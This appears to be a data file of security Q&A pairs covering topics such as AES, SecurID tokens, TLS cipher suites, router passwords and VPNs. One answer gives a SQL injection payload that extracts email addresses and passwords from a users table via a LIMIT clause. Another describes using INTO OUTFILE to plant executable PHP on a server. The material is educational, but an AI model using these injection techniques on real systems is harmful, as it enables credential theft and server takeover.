source_id
int64 1
4.64M
| question
stringlengths 0
28.4k
| response
stringlengths 0
28.8k
| metadata
dict |
---|---|---|---|
76,452 | I am implementing an AES 256 algorithm on credit cards and I am wondering if I would be strengthening or weakening the encrypted dataset if I split the dataset and persisted it in two locations. I don't understand AES algorithm enough to know if 'all bits must be present for cracking' or if a subset of the encrypted data actually makes it easier to crack. Here is the scenario: Text to encrypt : 4798531212123535 Algorithm : AES256 Key : b0882e32f1194793800f4f0b43ddec6b273d31aafc474c4c8a3d5ae35b3e104b Encrypted data : GoCN4o35w4vzU4hQp47CLUgsTgaxRvvT7qdTVh5Hl+I= Q1 : If I were to split the dataset into 2 parts and store them in 2 repositories in 2 parts of the country...If one of the parts were compromised, did I weaken the security by splitting? Q2 : A following question would be: if the partial dataset & the key were compromised, can the key be used to decrypt part of the dataset or does the entire dataset have to be present to win? Part 1 : GoCN4o35w4vzU4hQp47CLUgs Part 2 : TgaxRvvT7qdTVh5Hl+I= ------------ Added for clarity -------------- If Part 1 and the Key were compromised, would the result of decryption result in anything of value? Would the result be a correct sequence of characters? Compromised values : Part 1 : GoCN4o35w4vzU4hQp47CLUgs Key : b0882e32f1194793800f4f0b43ddec6b273d31aafc474c4c8a3d5ae35b3e104b Would the decrypted value be something like: 47985312 (which is a sequence of the original) | You are doing it wrong. Not in the splitting or whatever; but in the thinking . AES encryption, if done properly, won't be "cracked". AES is the most robust piece in your system; this is the last part of it that you should be worrying about. What AES encryption provides is a very specific functionality: using a given key K , it transforms a piece of data (the "plaintext") into something that is unreadable (the "ciphertext") except to those who know K , because knowing K allows for reversing the transformation. As long as K remains unknown to attackers, the encrypted data is safe. If K is known to attackers, then they have won, and no amount of splitting, or swapping, or dancing around a fire while chanting the glory of the Great Spirit, will save you. AES uses keys of 128, 192 or 256 bits. There are so many possible keys that probability of an attacker compromising the key through pure luck is infinitesimal. 128-bit keys are sufficient for that; larger keys are not meant to increase security but to assert your status of alpha male among your fellow developers. If you really need to engage into elaborate data-shuffling rituals so that, for instance, your boss gets the impression that "security is happening" and you are not slacking away, then you may as well do it properly. Don't split; instead, given a sequence of bytes C (the encrypted string), generate a sequence of random bytes D of the same length; then "split" C into two shares C 1 = C XOR D , and C 2 = D . To assemble the shares, just XOR them together: it so happens that C 1 XOR C 2 = C . That kind of splitting is demonstrably secure (an attacker who learns C 1 or C 2 , but not both, learns exactly nothing , in an information-theoretic sense, which is about as good as any crypto can get). Provided, of course, that you don't botch things (you MUST generate a strongly random D , and generate a new one each time you have some string to "split"). | {
"source": [
"https://security.stackexchange.com/questions/76452",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/63870/"
]
} |
76,480 | I have been using RSA SecureID ® Keys for quite some time now (perhaps 10 years), for things such as securely my home banking account online or accessing my company's network of computers from home. These keys generate a 6-digit numeric token which is set to expire However, I've always wondered how these work. On the right-hand side there is a dot (not shown on the picture) which blinks once per second, and on the left there is a stack of six vertically-stacked horizontal bars, each of which disappears once every ten seconds. Every time sixty seconds have passed, the token resets itself, and the previous token becomes invalid. AFAIK these devices don't make use the network, and the numbers they generate must be checked by the server (whether the server be a bank or a company's server). Hence, inside this device there must be stored an algorithm that generates random numbers with a mechanism that includes a very precise timer powered by a small battery. The timer
must be very precise, since, the server needs to check the validity of the generated digits in the very same time interval. For every user/employee, the server must, as far as I understand, store the same random number generating algorithm, with one such algorithm per customer/employee. The chip must of course be constructed in such a way that if it is stolen then the attacker cannot access the random number generating algorithm stored therein, even if the device is broken. Is this how this works? Thanks! | Yes it does work as you say. The chip is "tamper resistant" and will erase the "seed" (secret key) if any attempt is made to attack it. This is often accomplished by having a non-user-replaceable battery and a "trap" that breaks power to the device once the device is opened, or the chip surface is removed. The key is then stored in a SRAM, requiring power to keep the key. The key is a seed, that combined with the current time in 60 second step (effectively, the current UNIX timestamp / 60), refreshes the code. No, the device does NOT need to be precise. Instead, the server will store the time of the last accepted code. Then the server will accept a code one minute earlier, one minute ahead, and at the current time, so if the current time at server is 23:20, then it will accept a code from 23:19, 23:20 and 23:21. After this, it will store the time of the last accepted code, eg if a 23:21 code was accepted, it will store 23:21 in a database, and refuse to accept any code that was generated at 23:21 or earlier. Now to the interesting part: To prevent an imprecise token from desynchronizing from the server, the server will store in its database, if it was required to accept a 23:19 code or a 23:21 code at 23:20 time. This will ensure that at next logon, the server will correct the code with the number of steps. Lets say you at Clock 23:20 login with a 23:19 code. Server stores "-1" in its database (and if it would be a 23:21 code, it would store "+1" in database). Next time you login, Clock is 23:40. Then the server will accept a 23:38, 23:39 or 23:40 code.
If a 23:38 code is accepted, it will store "-2" in database, at 23:39 it will keep "-1" in database, and at 23:40 it will store "0" in database. This effectively makes sure to keep the server synchronized to your token. On top of this, the system, if a token "ran too far away" from the server (due to it being unused for a long time), allows resyncronization. This is accomplished either by a system administrator, or a self service resynchronization service is presented where the token user is asked to provide 2 subsequent codes from the token, like 23:20 and 23:21, or 19:10 and 19:11. Note that the server will NEVER accept a token code generated at or prior to the time that "last used token code" was (as this would allow reuse of OTP codes). When a resyncronization is done, the token will store the difference from the provided 2 token codes, and the current server time and in a resync, the search window could be like plus/minus 50 steps (which would allow about 0,75 hours of desync in both directions). The server can detect a desynchronized token by generating the 50 prior codes and 50 future codes, and if the specified code matches that, it will launch the resync process automatically. Many times, to prevent an attacker from using the resync process to find valid codes, once an account is in resync mode, login will not be accepted without resyncing, which would require the attacker to find the exact code subsequent or prior to the code just found. | {
"source": [
"https://security.stackexchange.com/questions/76480",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/34560/"
]
} |
76,660 | I don't own a credit card but read much about fraud with stolen credit cards. Since I don't own one, I don't know how you exactly buy online using your credit card, so please correct me, if I am wrong (and I hope so). Customer choses articles in online shop and puts them into shopping
cart. Customer goes to the virtual check out. Customer enters delivery address and his cc data(?) and sends them to the server of the shop owner. Shop server sends the cc data the customer entered and his data and the amount to the cc card server and receives the money. Customer receives bought articles. The shop owner wasn't very honest and uses the cc data the customer entered to shop on other online shops (especially
non-trackable goods like software licenses, ...). Since the data is
the same for all shops, nobody knows which shop misused the cc data. Why not use an one-time authentification code or token instead? For example the customer enters the cc data on the server of the cc company which sends a confirmation to the shop owner or gives a signed token (like gpg) which the user gives the shop to prove he sent the money or the shop just waits till it sees the money on its account?
Since I have basic it-security knowledge you might also add technical details.
So are my assumptions right and if so, what prevents web shop owners from misusing credit card data? | The liability for a disputed transaction falls upon the merchant for Card-Not-Present transactions. Essentially, if you dispute a transaction, if the merchant doesn't have your signature, then if you persist they will end up footing the bill. By the same token, when a CNP merchant double bills you, they're going to end up paying when you dispute the bill. As @DavidFoerster points out, the processors and card companies track chargeback rates. They eye the statistics and, when a merchants is having too many chargebacks, they get cut off. (Usually they get booted from their processor, and go find another processor who'll charge them more for the higher risk). The same is true with stores that re-abuse cards elsewhere. The card brands look at fraud reports and determine that these 20 fraud report cards all had Bob's Web Shack in common as a past transaction. They will then investigate Bob's Web Shack - both because it might be a bad shop owner, and because it might be a shop that's compromised. And - again - if a shop is a source of problems, they'll get cut off. That's what prevents web shop owners from abusing the cards. They'll lose any disputes, and then they'll get dropped and be unable to process cards. | {
"source": [
"https://security.stackexchange.com/questions/76660",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/64016/"
]
} |
76,706 | A friend of mine built a web application that I'm testing for fun. I noticed that he allows a user to set the limit of a certain query, and that limit is not sanitized. For example, I can choose any number or string I like as a limit. I realize that this is SQL injection , and I can easily inject SQL commands, but is it really possible to extract any data or do any damage with a LIMIT ? Example of the query: SELECT * FROM messages WHERE unread = 1 LIMIT **USER INPUT HERE** I understand that if the injection was in the WHERE clause I could've easily done a UNION SELECT to extract any information, but is that really possible if the user input was after the limit? For more information, my friend is using the MySQL DBMS, so you can't really execute two queries such as: SELECT * FROM messages WHERE unread = 1 LIMIT 10;DROP TABLE messages-- It is not possible. | You can make a UNION SELECT here. The only problem is to match the columns from messages, but you can guess those by adding columns until it fits: SELECT * FROM messages WHERE unread = 1 LIMIT
1 UNION SELECT mail,password,1,1,1 FROM users Just keep adding ,1 until you get the correct column count. Also, you need to match the column type. Try null instead of 1 . If you can see MySQL errors that would help big time here. Otherwise you got a lot of trying. Also see Testing for SQL Injection at owasp.org for some details. | {
"source": [
"https://security.stackexchange.com/questions/76706",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/64055/"
]
} |
76,940 | I fairly understand the math behind RSA, Elgamal, AES, SHA but not how things are used in practise. How are subkeys different from master key? I understand its purpose from various websites but How is it internally implemented? How is it bound to the master key? Is it an OpenPGP terminology? | This post by user rjh from 2008 in the enigmail forum answers it well: Originally in PGP 2.6, back in the early 90s, you had just one keypair
and it was used for both encryption and signing. The ability to have
additional keypairs presented some engineering challenges. Ultimately,
it was decided that the additonal keypairs would be called "subkeys",
despite the fact there's nothing "sub" about them. Likewise, what you
call your "key" isn't really a key at all--the terminology is a
holdover from the days when a key really was a key. Nowadays, a key is
really a collection of keys, along with some metadata for user
identifiers, signatures, etc. E.g., my "key" has four keypairs on it: 5B8709EB, D0C6AAE4, 71E177DB
and 8DB02BBB3. What GnuPG calls your "public key" is really the oldest signing key in
the collection. E.g., since 5B8709EB was created first, GnuPG calls
the entire set of keys and metadata the "5B8709EB key". So, "is it possible to have a key that's used for encryption and
signing without any subkey at all?" The answer here is no, because all keypairs on a key are subkeys. Even if there's only one of them. | {
"source": [
"https://security.stackexchange.com/questions/76940",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2508/"
]
} |
76,993 | It has become quite difficult to configure an HTTPS service that maintains "the ideal transport layer". How should an HTTPS service be configured to permit some reasonable level of compatibility while not being susceptible to even minor attacks? TLS downgrade attacks in combination Beast, Crime, Breach, and Poodle knocks out most if not all of SSLv3 and prior. Microsoft is disabling SSLv3 by default , which sounds like a good move to me. Due to weaknesses in RC4 , MD5, and SHA1, there are even fewer cipher suites to choose from. Would an 'ideal' HTTPS service only enable TLS 1.0, 1.1 and 1.2 with key-size variants following ciphers? What should be the most preferred cipher suite? TLS_RSA_WITH_AES_128_CBC_SHA256
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
TLS_DHE_DSS_WITH_AES_128_CBC_SHA256
TLS_RSA_WITH_AES_128_GCM_SHA256
TLS_DH_RSA_WITH_AES_128_GCM_SHA256 | Would an 'ideal' HTTPS service only enable TLS 1.0, 1.1 and 1.2 with key-size variants following ciphers? No, an 'ideal' HTTPS service would enable only TLS 1.2 and enable only AEAD (Authenticated Encryption with Associated Data) based cipher suites with SHA-2, 4096 bit DH parameters and 521 bit EC curves of a type that matches your requirements (government approved or not government generated). Said service would also be unable to connect be used by a wide variety of older clients, including Android 4.3 and earlier, IE 10 and earlier, Java 7 (at least u25) and earlier), OpenSSL 0.9.8y and earlier (OpenSSL 1.0.0 is simply not listed on my source), and so on. It would, however, be immune to any attack that works only on TLS 1.1 and below, any attack relying on SHA-1, and any attack relying on CBC mode or outdated ciphers like RC4. Client cipher suite limitations per https://www.ssllabs.com . What should be the most preferred cipher suite? It depends! I assume Foward Secrecy is a requirement. I assume "believed to be reasonably secure at this time" is a requirement. I assume "actually implemented by at least one major actor" is a requirement. All requirements regarding must have/cannot use some or another subset of ciphers (must use X, can't use Y, etc.). Thus, I would propose the following lists as a reasonable start. Begin with the top category (TLS 1.2 AEAD), then keep going down the list and adding categories until you reach a level that works with your userbase or you've reached the end of your comfort zone, whichever comes first. Include as many cipher suites of each category as you can, so that when the next attack rolls around, you'll be able to remove the affected cipher suites and continue with the remainder. Keep an eye on the threat environment so you can continue removing cipher suites that demonstrate vulnerabilities. Within each major category, please order or cull the cipher suites according to your taste: DHE is of course slower than ECDHE, but takes elliptic curve provenance out entirely, and so on. At this time, it appears that ordering is a tradeoff, but if you want speed, prefer or even require TLS_ECDHE_*. If you don't trust the currently commonly implemented elliptic curves, or are concerned about elliptic curves due to the NSA Suite B guidance from Aug 2015 indicating a move away from prior Suite B elliptic curves is coming in the near future , and are willing to burn CPU, prefer or even require TLS_DHE_* suites. Bear in mind that "normal" certificates are RSA certificates, which work with both TLS_ECDHE_RSA_* and TLS_DHE_RSA_* cipher suites. DSA certificates which work with TLS_ECDHE_ECDSA_* cipher suites are very rare so far, and many CA's don't offer them. TLS 1.2 AEAD only (all are SHA-2 as well) TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256 (new 0xcca9, Pre-RFC7905 0xcc14) TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256 (new 0xcca8, Pre-RFC7905 0xcc13) TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256 (new 0xccaa, Pre-RFC7905 0xcc15) TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (0xc030) TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (0xc02f) For U.S. folks who are interested in NIST compliance, this is a TLS 1.2 should category cipher suite for servers using RSA private keys and RSA certificates per NIST SP800-52 revision 1 table 3-3 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 (0x9f) TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 (0x9e) TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 (0xc02c) For U.S. folks who are interested in NIST compliance, this is a TLS 1.2 should category cipher suite for servers using elliptic curve private keys and ECDSA certificates per NIST SP800-52 revision 1 table 3-5 TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 (0xc02b) For U.S. folks who are interested in NIST compliance, this is a TLS 1.2 should category cipher suite for servers using elliptic curve private keys and ECDSA certificates per NIST SP800-52 revision 1 table 3-5 These are the highest level of security I'm currently aware of in common TLS implementations. As of Jan 2017, major modern browsers DO handle this level, including but not limited to Android with 6.0 supporting AES-GCM and - alone of the main ones - old valued CHACHA20-POLY1305 and 7.0 supporting new CHACHA20-POLY1305, Chrome with both AES-GCM and CHACHA20-POLY1305, Firefox with both AES-GCM and CHACHA20-POLY1305, IE and Edge with only AES-GCM, Java with only AES-GCM, OpenSSL 1.1.0 with both AES-GCM and CHACHA20-POLY1305, Safari with only AES-GCM). Many major browsers cannot handle this, even 2015 vintage ones (Safari 7 on OSX 10.9, Android 4.3 and earlier, IE 10 on Win7 (IE 11 even on Win7 will support 0x9f and 0x9e if Windows has been patched) TLS 1.2 SHA2 family (non-AEAD) TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 (0x6b) TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 (0x67) TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 (0xc028) TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 (0xc027) For U.S. folks who are interested in NIST compliance, this is a TLS 1.2 should category cipher suite for servers using RSA private keys and RSA certificates per NIST SP800-52 revision 1 table 3-3 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384 (0xc024) For U.S. folks who are interested in NIST compliance, this is a TLS 1.2 may category cipher suite for servers using elliptic curve private keys and ECDSA certificates per NIST SP800-52 revision 1 table 3-5 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256 (0xc023) For U.S. folks who are interested in NIST compliance, this is a TLS 1.2 should category cipher suite for servers using elliptic curve private keys and ECDSA certificates per NIST SP800-52 revision 1 table 3-5 TLS_ECDHE_RSA_WITH_CAMELLIA_256_CBC_SHA384 (0xc077) TLS_ECDHE_RSA_WITH_CAMELLIA_128_CBC_SHA256 (0xc076) TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA256 (0xc4) Note that you've lost AEAD mode and are using the much older CBC mode; this is less than ideal. CBC mode has been a contributing factor for several attacks in the past, including Lucky Thirteen and BEAST, and it's not unreasonable to believe that CBC mode may be related to future vulnerabilities also. Some modern browsers that don't have any AEAD cipher suites do have one more more suited in this category, for instance, IE 11 on Win7 can use TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 and Safari 6 and 7 can use a few of these again, this is if you don't have ECDHE_ECDSA GCM suites working) TLS 1.0 and 1.1 with modern ciphers (and outdated hashes, since that's all that's available) TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (0xc014) For U.S. folks who are interested in NIST compliance, this is a may category cipher suite for servers using RSA private keys and RSA certificates per NIST SP800-52 revision 1 table 3-2 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (0xc013) For U.S. folks who are interested in NIST compliance, this is a should category cipher suite for servers using RSA private keys and RSA certificates per NIST SP800-52 revision 1 table 3-2 TLS_DHE_RSA_WITH_AES_256_CBC_SHA (0x39) TLS_DHE_RSA_WITH_AES_128_CBC_SHA (0x33) TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA (0x88) TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA (0x45) TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA (0xc00a) Once you're including cipher suites from this level, you're likely to find something that works with almost all modern implementations. At this level, you're not only using CBC mode, you're also using SHA-1. NIST SP800-131A recommended that SHA-1 be disallowed for digital signature generation after Dec 31, 2013 (a year ago today, actually). TLS 1.0 and 1.1 with older but still reasonable ciphers and outdated hashes TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA (0x16) TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA (0xc012) For U.S. folks who are interested in NIST compliance, this is a should category cipher suite for servers using RSA private keys and RSA certificates per NIST SP800-52 revision 1 table 3-2 TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA (0xc008) For U.S. folks who are interested in NIST compliance, this is a should category cipher suite for servers using elliptic curve private keys and ECDSA certificates per NIST SP800-52 revision 1 table 3-4 IE 8 on Windows XP is still out of luck, as is Java 6u45 due to DH parameter maximums. This is absolutely the minimum level I'd recommend going to. Note that for servers using RSA private keys and RSA certificates who need NIST SP800-52 revision 1 compliance, you SHALL , should , and may implement specific other TLS_RSA_* cipher suites which DO NOT PROVIDE forward secrecy, and thus I would not recommend unless this compliance is required. Note also that paragraph 3.3.1 of that document states specific "The server shall be configured to only use cipher suites that are composed entirely of Approved algorithms. A complete list of acceptable cipher suites for general use is provided in this section..." Other national and industry requirements will vary, of course. and may conflict with each other; read all of those that apply to you carefully. I'll put in the usual plug here - try out your cipher list with your own tools (openssl ciphers -v '...' for openssl based systems), go to https://www.ssllabs.com/index.html first to check on cipher suites supported by various clients, then set up your site, and then go back to www.ssllabs.com and run their server test. Note that _ECDSA_ cipher suites require ECDSA certificates, of course, and those are still very hard to find. ETA: NSA Suite B EC advice, and IE 11/Win7 now supports 0x9f and 0x9e. ETA: As of Jan 2016, NIST SP800-52r1 is unchanged, and one new cipher suite (0xc00a) has been added to the list. ETA: As of Jan 2017, RFC7905 has change the three TLS 1.2 AEAD CHACHA20-POLY1305 ciphers, and "modern" browsers have drastically improved AEAD support as noted in new bullet. See https://www.iana.org/assignments/tls-parameters/tls-parameters.xhtml#tls-parameters-4 for up to date IANA cipher suites. | {
"source": [
"https://security.stackexchange.com/questions/76993",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/975/"
]
} |
77,028 | All the OpenVPN/ Easy-RSA tutorials that I've found, advise to setting an empty challenge password while building the key for the OpenVPN server. Anybody knows why? What's the intended use for the challenge password in Easy-RSA server's keys? And what about client's keys? I see that a build-key-pass exists to generate encrypted client keys, but no server equivalent exists. Still, both build-key and build-key-pass ask for a challenge password . | "Challenge password" is an obscure and usually useless feature. -> Leave empty. If your CA allows this, then the Challenge Password will be required of anyone who tries to get the cert revoked. -- But from what I understand there are few ( or none? ) CAs that actually use this. ( Please leave a comment if you know otherwise. ) So leave it empty if you're unsure. What's the intended use of a "Challenge Password"? As far as I understand it the idea is this: If you have a rogue admin who has access to the cert and key then that admin could revoke the cert and DOS you. But if you have a CA that will challenge the rogue admin to supply the "Challenge Password" , then the rogue admin may not have that password and then you're safe from that DOS. (The CP is NOT included in either cert or key. Only in the CSR. And you don't need the CSR for daily operations, so presumably operations personnel might not come into contact with the CSR file and therefore not know the Challenge Password .) (But bear in mind that you still have to worry about a rogue admin who has your cert/key. A lot. So from my understanding you gain exactly nothing from having a "challenge password" in the first place. -- Correct me if I'm wrong. I've got the feeling I'm missing some essential idea here. -- Maybe this is meant to allow revocation by somebody holding just the certificate and the password but NOT the private key.) Further reading The (too short) official definition is here: RFC 2985: PKCS #9: Selected Object Classes and Attribute Types Version 2.0, Section 5.4.1: Challenge password The question comes up regularly: https://superuser.com/questions/376179/confusion-with-pem-pass-phrase-and-challenge-password https://serverfault.com/questions/266232/what-is-a-challenge-password Further source: Randall Perry, "OpenSSL-Users" mailing list, 2014-05-22, Re: CSR challenge password: What's the point? | {
"source": [
"https://security.stackexchange.com/questions/77028",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/61529/"
]
} |
77,039 | Is it possible to execute some code (e.g. PHP code on a PHP-based web application) on the server through SQL injection? If yes, how exactly? I understand that un-escaped field can lead to SQL injection and an attacker can execute SQL commands of his choice directly on the server. But I think of running only SQL commands, not some arbitrary code. Am I wrong here? | SQL database systems typically have an export mechanism which can write arbitrary files on the server, e. g. SELECT ... INTO OUTFILE in MySQL. If an attacker is able to assemble such a query and isn't stopped by restrictive permissions, they can in fact create PHP scripts. Now they still need to get the server to execute the script. In the easiest case, they have write access to a web directory. If they request the script, the webserver will happily execute it. | {
"source": [
"https://security.stackexchange.com/questions/77039",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/64186/"
]
} |
77,112 | How bad is it to not change the default home router password? Are there any concrete dangers? Are there any attacks directly resulting out of the use of default passwords, not vulnerabilities in the firmware?[*] You can assume that anyone legitimately connected to the router is allowed to access and change it's configuration [**]. [*] I found this vulnerability , but it seems to be a vulnerability in the router firmware (which could be prevented using anti-csrf tokens), not a direct result of using a default password. [**] So I'm not worried about other residents or visitors that are allowed access to the network. | The wireless router is the gateway to your entire home network, from a wireless baby monitor, to the secure computers you do your banking on. Controlling this gateway gives an attacker access to the devices inside the network and to data that passes through it. It's no surprise that home routers are a new frontier for the criminal underground and default passwords is one of the main vectors of attack. In 2011 and 2012 attackers exploited a vulnerability to change the DNS settings of more than 4.5 million DSL modems in Brazil. In March 2014 Team Cymru reported that over 300,000 home routers had been compromised and had their DNS settings changed in a global attack campaign. In September 2014 , again there was a large scale attack on Brazilian routers. Most of these attacks involved two vulnerabilities, a CSRF (Cross-Site Request Forgery) that is present in many brands of routers and default passwords. This means that visiting a malicious website will force your web browser to log into your home router and make configurations changes. This article describes a similar attack and its severe consequences. It all started in 2007 when this attack was published . The main condition for the attack to be successful was that the attacker to guess the router password, because back then, even Cisco had 77 routers vulnerable to CSRF. And the problem of default passwords is still real in 2014: Tripwire spoke to 653 IT and security professionals, and 1009 remote workers in the US and UK –
with alarming results. Thirty percent of IT professionals and 46% of
workers polled do not even change the default password on their
wireless routers. Even more (55% and 85%, respectively) do not change
the default IP address on their routers (making cross-site request
forgery – CSRF – attacks much easier).
( Source ) The dangers of having the internet facing admin panel with default passwords should obvious. But an open network with the admin panel open to the local network is vulnerable to local attacks. Wardriving with good antennas can cover large areas and spot many vulnerable routers. Once it has access, an attacker can change DNS settings and intercept data for serving malware, ads or phishing. Or it can open up the internal network and attack some old unpatched Android phones, and maybe hope that one of those devices will travel and be an entry point to a different, higher value network. Also, routers most likely store credentials for connecting to the ISP, which can be reused or abused by the attacker. I've heard of wireless routers that had one open network for guests and one password protected network. Connecting to the open network and accessing the admin panel with default credentials allowed access to the router configuration file that had the WPA key for the password protected network. While some users are ignorant about security, there are router manufacturers that aren't ignorant about their users' security and provide unique admin passwords for each router. Most passwords are printed on the permanent sticker along the other details such as model and MAC address. This is not as secure as my recently purchased router, which had the password printed on a card and which required changing it on first use. As Malavos mentioned in the comments, there are ISPs that lease routers with default password and even some that forbid changing those defaults passwords. I'm adding that some ISPs will change the default passwords and use it to configure the router remotely, but they will set the same password for all their clients' routers. This is problematic because that password can be recovered through hardware hacking so every router with that password can be compromised, even remotely. Main rules for protecting wireless routers: Update router firmware Turn off unneeded services Set strong admin passwords | {
"source": [
"https://security.stackexchange.com/questions/77112",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8754/"
]
} |
77,241 | I know that with SSL/TLS, man in the middle attacks are not possible. For example if Alice and Bob are trying to communicate and Trudy is trying to perform a man in the middle attack, then when Alice gets the public key from Bob (but really it is Trudy tricking Alice), the public key will not match with the certificate authorities and therefore not work. I know with SSH, only the first connection to a server is possibly open to an active man in the middle attack. This is because during the first connection, the client records the server's public key in $HOME/ssh/known_hosts file. Every connection after that checks this file to make sure the public keys match. But how does VPN encryption work with connection set-up? Are certificates used for passing the symmetric keys like in SSL/TLS? If not, does this not make VPNs vulnerable to active man in the middle attacks during key exchanges? | In order to protect from a man-in-the-middle attack, at least one of the endpoints of the communication needs to have some prior knowledge about the other endpoint. It's usually up to the client to verify that it's talking to the right server, because servers tend to allow potentially any client to connect to them. The general term for the kind of infrastructure that provides this prior knowledge is a public-key infrastructure . In the case of HTTPS, the prior knowledge normally comes with the intermediate step of a certificate authority . A web browser contains a predefined list of CA with their public keys, and accepts a website as genuine if it can demonstrate that its public key has been signed by the private key a CA. In the case of SSH, the prior knowledge normally comes from having contacted the server previously: the client records the server's public key and refuses to proceed if the server's public key is not the recorded one. (This also exists for HTTPS with certificate pinning .) On the first connection, it's up to the SSH user to verify the public key. There is no standard followed by VPN software. You need to read the documentation of your VPN software. In enterprise deployments, it is common to either deploy the server certificate to employees' computers alongside the VPN software, or require the employee to make a first connection to the VPN from inside the company network where a MITM attack is not feared. The certificate is then stored in the VPN software configuration and the VPN client will refuse to connect if the server's public key changes. If you're deploying a VPN service for your own use or for your organization's use, you should take care of provisioning the server certificate at installation time, before you go out in the wild. If a secure network is not available, you'll need to rely on some other communication channel to send the certificate. It could be an email, if that's how you identify users, but it would be best to rely on a pre-existing infrastructure such as GPG keys (send the certificate in a signed email) — which of course only shifts the problem to how to verify the GPG key. If you're using a cloud-based VPN service, that service should provide you a way to verify their certificate (e.g. a web page served over HTTPS) and should document how to install the certificate or how to verify it on first use. Again, there isn't a single process that all VPN software follow. | {
"source": [
"https://security.stackexchange.com/questions/77241",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/61028/"
]
} |
78,621 | I am currently renewing an SSL certificate, and I was considering switching to elliptic curves. Per Bernstein and Lange , I know that some curves should not be used but I'm having difficulties selecting the correct ones in OpenSSL: $ openssl ecparam -list_curves
secp112r1 : SECG/WTLS curve over a 112 bit prime field
secp112r2 : SECG curve over a 112 bit prime field
secp128r1 : SECG curve over a 128 bit prime field
secp128r2 : SECG curve over a 128 bit prime field
secp160k1 : SECG curve over a 160 bit prime field
secp160r1 : SECG curve over a 160 bit prime field
secp160r2 : SECG/WTLS curve over a 160 bit prime field
secp192k1 : SECG curve over a 192 bit prime field
secp224k1 : SECG curve over a 224 bit prime field
secp224r1 : NIST/SECG curve over a 224 bit prime field
secp256k1 : SECG curve over a 256 bit prime field
secp384r1 : NIST/SECG curve over a 384 bit prime field
secp521r1 : NIST/SECG curve over a 521 bit prime field
prime192v1: NIST/X9.62/SECG curve over a 192 bit prime field
prime192v2: X9.62 curve over a 192 bit prime field
prime192v3: X9.62 curve over a 192 bit prime field
prime239v1: X9.62 curve over a 239 bit prime field
prime239v2: X9.62 curve over a 239 bit prime field
prime239v3: X9.62 curve over a 239 bit prime field
prime256v1: X9.62/SECG curve over a 256 bit prime field
sect113r1 : SECG curve over a 113 bit binary field
sect113r2 : SECG curve over a 113 bit binary field
sect131r1 : SECG/WTLS curve over a 131 bit binary field
sect131r2 : SECG curve over a 131 bit binary field
sect163k1 : NIST/SECG/WTLS curve over a 163 bit binary field
sect163r1 : SECG curve over a 163 bit binary field
sect163r2 : NIST/SECG curve over a 163 bit binary field
sect193r1 : SECG curve over a 193 bit binary field
sect193r2 : SECG curve over a 193 bit binary field
sect233k1 : NIST/SECG/WTLS curve over a 233 bit binary field
sect233r1 : NIST/SECG/WTLS curve over a 233 bit binary field
sect239k1 : SECG curve over a 239 bit binary field
sect283k1 : NIST/SECG curve over a 283 bit binary field
sect283r1 : NIST/SECG curve over a 283 bit binary field
sect409k1 : NIST/SECG curve over a 409 bit binary field
sect409r1 : NIST/SECG curve over a 409 bit binary field
sect571k1 : NIST/SECG curve over a 571 bit binary field
sect571r1 : NIST/SECG curve over a 571 bit binary field
c2pnb163v1: X9.62 curve over a 163 bit binary field
c2pnb163v2: X9.62 curve over a 163 bit binary field
c2pnb163v3: X9.62 curve over a 163 bit binary field
c2pnb176v1: X9.62 curve over a 176 bit binary field
c2tnb191v1: X9.62 curve over a 191 bit binary field
c2tnb191v2: X9.62 curve over a 191 bit binary field
c2tnb191v3: X9.62 curve over a 191 bit binary field
c2pnb208w1: X9.62 curve over a 208 bit binary field
c2tnb239v1: X9.62 curve over a 239 bit binary field
c2tnb239v2: X9.62 curve over a 239 bit binary field
c2tnb239v3: X9.62 curve over a 239 bit binary field
c2pnb272w1: X9.62 curve over a 272 bit binary field
c2pnb304w1: X9.62 curve over a 304 bit binary field
c2tnb359v1: X9.62 curve over a 359 bit binary field
c2pnb368w1: X9.62 curve over a 368 bit binary field
c2tnb431r1: X9.62 curve over a 431 bit binary field
wap-wsg-idm-ecid-wtls1: WTLS curve over a 113 bit binary field
wap-wsg-idm-ecid-wtls3: NIST/SECG/WTLS curve over a 163 bit binary field
wap-wsg-idm-ecid-wtls4: SECG curve over a 113 bit binary field
wap-wsg-idm-ecid-wtls5: X9.62 curve over a 163 bit binary field
wap-wsg-idm-ecid-wtls6: SECG/WTLS curve over a 112 bit prime field
wap-wsg-idm-ecid-wtls7: SECG/WTLS curve over a 160 bit prime field
wap-wsg-idm-ecid-wtls8: WTLS curve over a 112 bit prime field
wap-wsg-idm-ecid-wtls9: WTLS curve over a 160 bit prime field
